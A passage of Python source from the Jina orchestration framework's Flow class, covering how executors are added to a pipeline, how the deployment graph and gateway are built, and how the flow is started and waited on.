Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the deployment
:param runtime_backend: The parallel backend of the runtime inside the Pod
:param runtime_cls: The runtime class to run inside the Pod
:param shards: The number of shards in the deployment running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/create-flow/#complex-flow-topologies
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pod waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
        :param uses_after_address: The address of the uses-after runtime
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
no_graphql_endpoint: Optional[bool] = False,
polling: Optional[str] = 'ANY',
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
timeout_ctrl: Optional[int] = 60,
uses: Optional[str] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect deployments in the flow.
If `REMOVE` is given then all inspect deployments are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param no_graphql_endpoint: If set, /graphql endpoint is removed from HTTP interface.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._deployment_nodes = OrderedDict() # type: Dict[str, Deployment]
self._inspect_deployments = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_deployment = [
GATEWAY_NAME
] #: default first deployment is gateway, will add when build()
self._update_args(args, **kwargs)
if (
self.protocol == GatewayProtocolType.HTTP
and not self.args.no_graphql_endpoint
and not docarray_graphql_compatible()
):
self.args.no_graphql_endpoint = True
warnings.warn(
'DocArray version is incompatible with GraphQL features. '
'Automatically setting no_graphql_endpoint=True. '
f'To use GraphQL features, install docarray>={GRAPHQL_MIN_DOCARRAY_VERSION}'
)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from jina.helper import ArgNamespace
from jina.parsers.flow import set_flow_parser
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from jina.orchestrate.flow.asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(
op_flow, deployment_name, endpoint, connect_to_last_deployment=False
) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_deployment and connect_to_last_deployment:
endpoint = [op_flow.last_deployment]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == deployment_name:
raise FlowTopologyError(
                    'the input/output of a deployment can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Deployment
endpoint = set(op_flow._inspect_deployments.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_deployment(self):
"""Last deployment
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_deployment[-1]
@last_deployment.setter
def last_deployment(self, name: str):
"""
Set a Deployment as the last Deployment in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Deployment
"""
if name not in self._deployment_nodes:
raise FlowMissingDeploymentError(f'{name} can not be found in this Flow')
if self._last_changed_deployment and name == self.last_deployment:
pass
else:
self._last_changed_deployment.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
deployments_addresses: Dict[str, List[str]],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port=self.port,
deployment_role=DeploymentRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.noblock_on_start = True
args.no_graphql_endpoint = (
self.args.no_graphql_endpoint
) # also used in Flow, thus not in kwargs
args.graph_description = json.dumps(graph_description)
args.deployments_addresses = json.dumps(deployments_addresses)
self._deployment_nodes[GATEWAY_NAME] = Deployment(args, needs)
def _get_deployments_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
graph_dict[node] = [f'{v.protocol}://{v.host}:{v.head_port}']
return graph_dict
def _get_k8s_deployments_addresses(
self, k8s_namespace: str, k8s_connection_pool: bool
) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.deployments.config.helper import to_compatible_name
from jina.serve.networking import K8sGrpcConnectionPool
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
if v.external:
deployment_k8s_address = f'{v.host}'
else:
deployment_k8s_address = (
f'{to_compatible_name(v.head_args.name)}.{k8s_namespace}.svc'
)
# we only need hard coded addresses if the k8s connection pool is disabled or if this deployment is external
if not k8s_connection_pool or v.external:
graph_dict[node] = [
f'{deployment_k8s_address}:{v.head_port if v.external else K8sGrpcConnectionPool.K8S_PORT}'
]
return graph_dict if graph_dict else None
def _get_docker_compose_deployments_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.deployments.config.docker_compose import port
from jina.orchestrate.deployments.config.helper import to_compatible_name
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
deployment_docker_compose_address = (
f'{to_compatible_name(v.head_args.name)}:{port}'
)
graph_dict[node] = [deployment_docker_compose_address]
return graph_dict
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same deployment
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._deployment_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# connect the last non-gateway deployment to the end-gateway
last_deployment = self.last_deployment
if last_deployment != 'gateway':
graph_dict[last_deployment].append('end-gateway')
return graph_dict
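# Illustrative sketch (not part of the original source): for a hypothetical Flow built as
# `Flow().add(name='enc').add(name='idx', needs='enc')`, this method would produce a dict
# roughly like
#     {'start-gateway': ['enc'], 'enc': ['idx'], 'idx': ['end-gateway']}
# i.e. every key lists the deployments that receive from it, with the gateway split into
# a start node and an end node.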
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all Pods defined in **needs** have completed.
.. # noqa: DAR401
:param needs: list of service names to wait for
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name,
needs=needs,
deployment_role=DeploymentRoleType.JOIN,
*args,
**kwargs,
)
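# Illustrative sketch (not part of the original source): `needs` is typically used to join
# two parallel branches back into one, e.g.
#     f = (Flow()
#          .add(name='branch_a')
#          .add(name='branch_b', needs='gateway')
#          .needs(['branch_a', 'branch_b'], name='joiner'))
# where 'branch_a', 'branch_b' and 'joiner' are hypothetical deployment names.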
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Deployments so far and add a blocker to the Flow; wait until all hanging Pods have completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_deployments(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_deployment
@overload
def add(
self,
*,
connection_list: Optional[str] = None,
daemon: Optional[bool] = False,
disable_reduce: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
name: Optional[str] = None,
native: Optional[bool] = False,
polling: Optional[str] = 'ANY',
port: Optional[int] = None,
port_jinad: Optional[int] = 8000,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'WorkerRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connection_list: dictionary JSON with a list of connections to configure
:param daemon: The Pod attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true tells the Pod not to wait on the Runtime when closing.
:param disable_reduce: Disable the built-in reduce mechanism, set this if the reduction is to be handled by the Executor connected to this Head
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to the Docker SDK when starting the docker
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in the Docker image. When not set, the Docker image ENTRYPOINT takes effect.
:param env: The map of environment variables that are available inside runtime
:param external: The Deployment will be considered an external Deployment that has been started independently from the Flow. This Deployment will not be context-managed by the Flow.
:param force_update: If set, always pull the latest Hub Executor bundle even if it exists locally
:param gpus: This argument allows a dockerized Jina Executor to discover local GPU devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display`
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port: The port for input data to bind to, default is a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param pull_latest: Pull the latest image before running
:param py_modules: The custom Python modules that need to be imported before loading the Executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the deployment
:param runtime_backend: The parallel backend of the runtime inside the Pod
:param runtime_cls: The runtime class to run inside the Pod
:param shards: The number of shards in the deployment running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/create-flow/#complex-flow-topologies
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds that a Pod waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Deployment has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only a flat structure is supported, which means if you upload `[./foo/a.py, ./foo/b.py, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it can be one of the following:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When using it in Python, the following values are additionally accepted:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_after: The executor attached after the Pods described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_after_address: The address of the uses-after runtime
:param uses_before: The executor attached before the Pods described by --uses, typically used for sending to all shards, accepted type follows `--uses`
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split is provided, then the basename of that directory will be mounted into the container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_deployment
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
deployment_role: 'DeploymentRoleType' = DeploymentRoleType.DEPLOYMENT,
**kwargs,
) -> 'Flow':
"""
Add a Deployment to the current Flow object and return the new modified Flow object.
The attribute of the Deployment can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Deployment(s) that this Deployment receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param deployment_role: the role of the Deployment, used for visualization and route planning
:param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and return it; otherwise modify the Flow in place
:param kwargs: other keyword-value arguments that the Deployment CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# deployment naming logic
deployment_name = kwargs.get('name', None)
if deployment_name in op_flow._deployment_nodes:
new_name = f'{deployment_name}{len(op_flow._deployment_nodes)}'
self.logger.debug(
f'"{deployment_name}" is used in this Flow already! renamed it to "{new_name}"'
)
deployment_name = new_name
if not deployment_name:
deployment_name = f'executor{len(op_flow._deployment_nodes)}'
if not deployment_name.isidentifier():
# hyphens can not be used in deployment names
raise ValueError(
f'name: {deployment_name} is invalid, please follow the Python variable naming conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, deployment_name, needs, connect_to_last_deployment=True
)
# inherit kwargs from `Flow(kwargs1=..., kwargs2=...)`
for key, value in op_flow._common_kwargs.items():
# do not inherit the port argument from the flow
if key not in kwargs and key != 'port':
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Deployment
kwargs.update(
dict(
name=deployment_name,
deployment_role=deployment_role,
)
)
parser = set_deployment_parser()
if deployment_role == DeploymentRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# deployment workspace if not set then derive from flow workspace
if args.workspace:
args.workspace = os.path.abspath(args.workspace)
else:
args.workspace = self.workspace
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
port = kwargs.get('port', None)
if not port:
port = helper.random_port()
args.port = port
op_flow._deployment_nodes[deployment_name] = Deployment(args, needs)
op_flow.last_deployment = deployment_name
return op_flow
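# Illustrative sketch (not part of the original source): every `add` call returns a (copied)
# Flow, so deployments are chained fluently, e.g.
#     f = (Flow()
#          .add(uses='jinahub://Executor1', name='encoder', replicas=2)
#          .add(uses='indexer.yml', name='indexer', needs='encoder', shards=2))
# 'Executor1' and 'indexer.yml' are hypothetical Executor references.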
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Deployment in the Flow
Internally, it adds two Deployments to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BaseDeployment(_pass) -- Flow
|
-- PUB-SUB -- InspectDeployment (Hanging)
In this way, :class:`InspectDeployment` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Deployment
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_deployment = self.last_deployment
op_flow = self.add(
name=name,
needs=_last_deployment,
deployment_role=DeploymentRoleType.INSPECT,
*args,
**kwargs,
)
# now remove uses and add an auxiliary Deployment
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_deployment,
deployment_role=DeploymentRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_deployment by the auxiliary Deployment
op_flow._inspect_deployments[_last_deployment] = op_flow.last_deployment
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_deployment: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Deployments output into one Deployment. When the Flow has no inspect Deployment then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Deployment
:param include_last_deployment: whether to include the last modified Deployment in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [
k
for k, v in self._deployment_nodes.items()
if v.role == DeploymentRoleType.INSPECT
]
if needs:
if include_last_deployment:
needs.append(self.last_deployment)
return self.add(
name=name,
needs=needs,
deployment_role=DeploymentRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
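# Illustrative sketch (not part of the original source): an evaluator can be hung off the
# main pipeline via `inspect` and later stripped out at build time, e.g.
#     f = (Flow(inspect=FlowInspectType.REMOVE)  # drop all inspect nodes when building
#          .add(name='encoder')
#          .inspect(uses='eval.yml')
#          .add(name='indexer'))
# 'encoder', 'indexer' and 'eval.yml' are hypothetical names.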
def _get_gateway_target(self, prefix):
gateway_deployment = self._deployment_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_deployment.head_host,
'port': gateway_deployment.head_port,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and return it; otherwise modify the Flow in place
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._deployment_nodes:
op_flow._add_gateway(
needs={op_flow.last_deployment},
graph_description=op_flow._get_graph_representation(),
deployments_addresses=op_flow._get_deployments_addresses(),
)
removed_deployments = []
# if inspect is set to REMOVE, then all inspect-related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_deployment_nodes = OrderedDict()
for k, v in op_flow._deployment_nodes.items():
if not v.role.is_inspect:
filtered_deployment_nodes[k] = v
else:
removed_deployments.append(v.name)
op_flow._deployment_nodes = filtered_deployment_nodes
reverse_inspect_map = {
v: k for k, v in op_flow._inspect_deployments.items()
}
while (
len(op_flow._last_changed_deployment) > 0
and len(removed_deployments) > 0
and op_flow.last_deployment in removed_deployments
):
op_flow._last_changed_deployment.pop()
for end, deployment in op_flow._deployment_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Deployment
# but not those inspect related node
if op_flow.args.inspect.is_keep:
deployment.needs = set(
ep
if deployment.role.is_inspect
else op_flow._inspect_deployments.get(ep, ep)
for ep in deployment.needs
)
else:
deployment.needs = set(
reverse_inspect_map.get(ep, ep) for ep in deployment.needs
)
hanging_deployments = _hanging_deployments(op_flow)
if hanging_deployments:
op_flow.logger.warning(
f'{hanging_deployments} are hanging in this Flow with no Deployment receiving from them; '
f'double-check whether this is intentional or a mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_deployments) > 0:
# workaround: regenerate the gateway's graph and address info after removing inspect deployments
op_flow._deployment_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._deployment_nodes[
GATEWAY_NAME
].args.deployments_addresses = json.dumps(
op_flow._get_deployments_addresses()
)
op_flow._deployment_nodes[GATEWAY_NAME].update_pod_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why, but removing these 2 lines makes 2 tests fail
if GATEWAY_NAME in self._deployment_nodes:
self._deployment_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Deployments in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.orchestrate.pods.Pod`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
# set env only before the Deployment get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not v.external:
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_deployment_name, _deployment):
try:
if not _deployment.external:
results[_deployment_name] = 'pending'
_deployment.wait_start_success()
results[_deployment_name] = 'done'
except Exception as ex:
results[_deployment_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all deployments wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_deployments = [k for k, v in results.items() if v != 'done']
if error_deployments:
self.logger.error(
f'Flow is aborted because {error_deployments} could not be started.'
)
self.close()
raise RuntimeFailToStart
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_deployments} Deployments (i.e. {self.num_pods} Pods) are running in this Flow'
)
@property
def num_deployments(self) -> int:
"""Get the number of Deployments in this Flow
.. # noqa: DAR201"""
return len(self._deployment_nodes)
@property
def num_pods(self) -> int:
"""Get the number of pods (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_pods for v in self._deployment_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Two Flows are considered equal when they share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._deployment_nodes == b._deployment_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
